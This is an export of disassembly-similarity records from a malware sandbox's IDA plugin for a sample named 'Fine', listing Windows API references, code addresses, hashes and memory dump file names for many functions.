                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 3203458085-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 79a21959f8c8252f76aac097e8b603c13ab965350613f715e682893c1ffbd9fb
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 043822b0813a2b0aaf632599cd24690a6bd762b5e8b18dde47a84bc9dfb11afa
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 79a21959f8c8252f76aac097e8b603c13ab965350613f715e682893c1ffbd9fb
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B0B1D131604301EFD324DF24C885E2AB7A5AF99318F64854CF8564B3E2DB71ED4ACB91
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • __allrem.LIBCMT ref: 0020042A
                                                                                                                                                                                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00200446
                                                                                                                                                                                                                                                                                                                            • __allrem.LIBCMT ref: 0020045D
                                                                                                                                                                                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0020047B
                                                                                                                                                                                                                                                                                                                            • __allrem.LIBCMT ref: 00200492
                                                                                                                                                                                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 002004B0
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 1992179935-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 7ab4e4522df1a5d7a01a4217fd3014a07725063e1b86b206bd75d59396487a48
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8281EA71A20B069BF7219F69CCC1BAA73E9AF54324F24412AF511D76C3EBB0DD608B54
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,001F8649,001F8649,?,?,?,002067C2,00000001,00000001,8BE85006), ref: 002065CB
                                                                                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,002067C2,00000001,00000001,8BE85006,?,?,?), ref: 00206651
                                                                                                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0020674B
                                                                                                                                                                                                                                                                                                                            • __freea.LIBCMT ref: 00206758
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00203B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,001F6A79,?,0000015D,?,?,?,?,001F85B0,000000FF,00000000,?,?), ref: 00203BC5
                                                                                                                                                                                                                                                                                                                            • __freea.LIBCMT ref: 00206761
                                                                                                                                                                                                                                                                                                                            • __freea.LIBCMT ref: 00206786
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 1414292761-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 99d5fa2cb090e7ec064b0966de661bfa77db75c1e018a8e8ceed610e9f077d43
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 6ce1b0d93d7aa66d478cca62a269b237f4c1e7fd98a0667da6b61795c72fc54e
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 99d5fa2cb090e7ec064b0966de661bfa77db75c1e018a8e8ceed610e9f077d43
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A4510472620307AFEB248E64CC89EBBB7A9EB40714F144269FC14D61D2EB75DC70C660
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001DB329: _wcslen.LIBCMT ref: 001DB333
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0025D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0025C10E,?,?), ref: 0025D415
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0025D3F8: _wcslen.LIBCMT ref: 0025D451
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0025D3F8: _wcslen.LIBCMT ref: 0025D4C8
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0025D3F8: _wcslen.LIBCMT ref: 0025D4FE
                                                                                                                                                                                                                                                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0025C72A
                                                                                                                                                                                                                                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0025C785
                                                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0025C7CA
                                                                                                                                                                                                                                                                                                                            • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0025C7F9
                                                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0025C853
                                                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 0025C85F
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 1120388591-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 6d15c0848422f6247e0a46fe382bfa16a0c0549242ec25af6d4d78c321d950c0
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 925cbe4982da7c184579017dac378d3505c6b4467a3a33b0e40bf0ef8fe1226f
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6d15c0848422f6247e0a46fe382bfa16a0c0549242ec25af6d4d78c321d950c0
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1C818D30618341AFC715DF24C885E2ABBE9BF88308F24859DF4554B2A2DB71ED59CB91
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • VariantInit.OLEAUT32(00000035), ref: 002300A9
                                                                                                                                                                                                                                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 00230150
                                                                                                                                                                                                                                                                                                                            • VariantCopy.OLEAUT32(00230354,00000000), ref: 00230179
                                                                                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32(00230354), ref: 0023019D
                                                                                                                                                                                                                                                                                                                            • VariantCopy.OLEAUT32(00230354,00000000), ref: 002301A1
                                                                                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 002301AB
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Variant$ClearCopy$AllocInitString
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 3859894641-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 0df7cb1e1f576890b3dea31a0a5dde79882a8198745a5b1b36f1106781df3507
                                                                                                                                                                                                                                                                                                                            • Instruction ID: ce5011dbb72fedb88d3e7ef9dbcf8c740c496e1c69b3233e771d9c1fc690bdec
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0df7cb1e1f576890b3dea31a0a5dde79882a8198745a5b1b36f1106781df3507
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 60511BB5A20311E6CF64AF6498E9B2AB3A5EF55310F108447FD06DF296DBB09C60CB71
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00246F21
                                                                                                                                                                                                                                                                                                                            • CoInitialize.OLE32(00000000), ref: 0024707E
                                                                                                                                                                                                                                                                                                                            • CoCreateInstance.OLE32(00270CC4,00000000,00000001,00270B34,?), ref: 00247095
                                                                                                                                                                                                                                                                                                                            • CoUninitialize.OLE32 ref: 00247319
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: CreateInitializeInstanceUninitialize_wcslen
• String ID: .lnk
• API String ID: 886957087-24824748
• Opcode ID: 111fa7f44222a95534cd775eb73e1670a86804572fb3175d0a3490eb3da859d7
• Instruction ID: d836e1c8098295dd42aefa315c709d8a377044b7fee476d244e62037d82f3d5c
• Opcode Fuzzy Hash: 111fa7f44222a95534cd775eb73e1670a86804572fb3175d0a3490eb3da859d7
• Instruction Fuzzy Hash: F2D15971518201AFC304EF24C881E6BB7E9FF99708F50495EF5968B262DB71ED09CB92
APIs
• InterlockedExchange.KERNEL32(?,000001F5), ref: 002411B3
• ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 002411EE
• EnterCriticalSection.KERNEL32(?), ref: 0024120A
• LeaveCriticalSection.KERNEL32(?), ref: 00241283
• ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0024129A
• InterlockedExchange.KERNEL32(?,000001F6), ref: 002412C8
Memory Dump Source
• Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
Similarity
• API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
• String ID:
• API String ID: 3368777196-0
• Opcode ID: d8c27e6e049a571bc7750ca1b1fe286749a06647cde2e6424625bb13a6cc5a5b
• Instruction ID: f17077a322c37f5253fb8cc9c22594362fd49663438c6b0efead7854ec37e1c0
• Opcode Fuzzy Hash: d8c27e6e049a571bc7750ca1b1fe286749a06647cde2e6424625bb13a6cc5a5b
• Instruction Fuzzy Hash: 42416F71A10219EFDF05DF64DC85AAA77B8FF04310F1480A5EE049A296DB70DEA1DBA0
APIs
• ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0022FBEF,00000000,?,?,00000000,?,002139E2,00000004,00000000,00000000), ref: 00268CA7
• EnableWindow.USER32(?,00000000), ref: 00268CCD
• ShowWindow.USER32(FFFFFFFF,00000000), ref: 00268D2C
• ShowWindow.USER32(?,00000004), ref: 00268D40
• EnableWindow.USER32(?,00000001), ref: 00268D66
• SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00268D8A
Memory Dump Source
• Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
Similarity
• API ID: Window$Show$Enable$MessageSend
• String ID:
• API String ID: 642888154-0
• Opcode ID: 486b3c1487857eba5841ff20f190f7c069efbd4ce90d8dae203f3b3038f5be42
• Instruction ID: e46968b6745e1b1d6d1b11f1992c0476b1d95449f8e0ac600e0075bd0494dc3a
• Opcode Fuzzy Hash: 486b3c1487857eba5841ff20f190f7c069efbd4ce90d8dae203f3b3038f5be42
• Instruction Fuzzy Hash: FE41BA30601246EFDB29DF24D889BA67BF1FB46704F244265E9084B1B2DB7168D9CB60
APIs
• GetForegroundWindow.USER32(?,?,00000000), ref: 00252D45
  • Part of subcall function 0024EF33: GetWindowRect.USER32(?,?), ref: 0024EF4B
• GetDesktopWindow.USER32 ref: 00252D6F
• GetWindowRect.USER32(00000000), ref: 00252D76
• mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00252DB2
• GetCursorPos.USER32(?), ref: 00252DDE
• mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00252E3C
Memory Dump Source
• Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
Similarity
• API ID: Window$Rectmouse_event$CursorDesktopForeground
• String ID:
• API String ID: 2387181109-0
• Opcode ID: b8329ec57cbc695350b0c9caf49298c517c627507979c77ee220af8fc231f024
• Instruction ID: c96738b7c561bd1680ceb82549a72b971aded7a0dd0485c6dd24722635f21199
• Opcode Fuzzy Hash: b8329ec57cbc695350b0c9caf49298c517c627507979c77ee220af8fc231f024
• Instruction Fuzzy Hash: 98312272A15316ABC720DF14E849F9BB7A9FF85314F00091AF885A7181CB71E91CCBD2
APIs
• IsWindowVisible.USER32(?), ref: 002355F9
• SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00235616
• SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0023564E
• _wcslen.LIBCMT ref: 0023566C
• CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00235674
• _wcsstr.LIBVCRUNTIME ref: 0023567E
Memory Dump Source
• Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 72514467-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 33c6df36859b6f7a6e5636fcee46cb35f8b6ad98ab959ddf3ad921fe5ca9a60d
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 03703ef01dff12a69ccb415e0f5bcd10642f71ebf23a06f424aae59414b9ee98
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 33c6df36859b6f7a6e5636fcee46cb35f8b6ad98ab959ddf3ad921fe5ca9a60d
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FF2168B26146187BEB165F35EC4AE7B7BECDF48710F008029F909CA091EBB0DC508AA0
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D5851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,001D55D1,?,?,00214B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 001D5871
                                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 002462C0
                                                                                                                                                                                                                                                                                                                            • CoInitialize.OLE32(00000000), ref: 002463DA
                                                                                                                                                                                                                                                                                                                            • CoCreateInstance.OLE32(00270CC4,00000000,00000001,00270B34,?), ref: 002463F3
                                                                                                                                                                                                                                                                                                                            • CoUninitialize.OLE32 ref: 00246411
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                                                                                                                                                                                                                                                                            • String ID: .lnk
                                                                                                                                                                                                                                                                                                                            • API String ID: 3172280962-24824748
                                                                                                                                                                                                                                                                                                                            • Opcode ID: c63c06ca53243585c7a7a591ab62dae0306d005aa0b2d9b777e6c4f708e76f65
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 28591c31f3ead142be3adc8e19b5ecb16db0b6ef10f6dce4afa106c124f5d0b1
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c63c06ca53243585c7a7a591ab62dae0306d005aa0b2d9b777e6c4f708e76f65
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 95D12471A142019FC718DF14C48892ABBF6FF9A714F14899DF8899B361CB31EC45CB92
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,001F36E9,001F3355), ref: 001F3700
                                                                                                                                                                                                                                                                                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 001F370E
                                                                                                                                                                                                                                                                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 001F3727
                                                                                                                                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,?,001F36E9,001F3355), ref: 001F3779
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 3852720340-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 7345572aae2d2bf199ce4a6409ff08ce98d2a5bcb607f862aed41ff09f2dcbdb
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 6e4850f20eaaad5622a362115d0e073bcd172a32fa9a4e1de8232ebb68a60ac7
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7345572aae2d2bf199ce4a6409ff08ce98d2a5bcb607f862aed41ff09f2dcbdb
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4C01F7B261E3296EA72A37B5BDCA6773A94EB15775B20032AF330C11F1EF514D126540
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00000000,001F4D53,00000000,?,?,001F68E2,?,?,00000000), ref: 002030EB
                                                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0020311E
                                                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00203146
                                                                                                                                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,?,00000000), ref: 00203153
                                                                                                                                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,?,00000000), ref: 0020315F
                                                                                                                                                                                                                                                                                                                            • _abort.LIBCMT ref: 00203165
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 3160817290-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: d72a525d1718d38fd8893611a22494e43173b0e4d1ffd1d0c962b213c01ee6c9
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 6fbae09626c6dbc136881126fea27560aefd1b1561c1d8f861d6bae426900206
